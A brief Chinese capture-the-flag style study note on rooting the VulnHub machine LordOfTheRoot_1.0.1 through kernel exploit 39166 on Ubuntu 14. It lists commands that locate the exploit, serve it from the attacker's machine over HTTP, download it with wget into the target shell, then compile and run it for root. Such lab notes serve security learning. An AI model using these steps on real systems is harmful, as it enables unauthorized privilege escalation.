LordOfTheRoot_1.0.1靶机学习笔记

补充

vulnhub靶场内核提权

通过信息收集获得靶机版本:

LordOfTheRoot_1.0.1靶机学习笔记_第1张图片

查找ubuntu 14*版本的内核漏洞:

LordOfTheRoot_1.0.1靶机学习笔记_第2张图片

使用Exploit:

searchsploit 39166 //在kali本地exploit库搜索

locate linux/local/39166.c //查看位置

cp /usr/share/exploitdb/exploits/linux/local/39166.c . //复制到指定目录

python -m SimpleHTTPServer 8081 // 在指定目录打开http服务

wget http://192.168.120.128:8081/39166.c //在shell 里面下载exp

gcc 39166.c -o 39166 //编译exp

./39166 //执行exp可执行文件

LordOfTheRoot_1.0.1靶机学习笔记_第3张图片

成功提权。

参考文章:vulnhub靶场内核提权、udf提权及缓冲区溢出提权 - FreeBuf网络安全行业门户

你可能感兴趣的:(靶场,学习,linux,运维)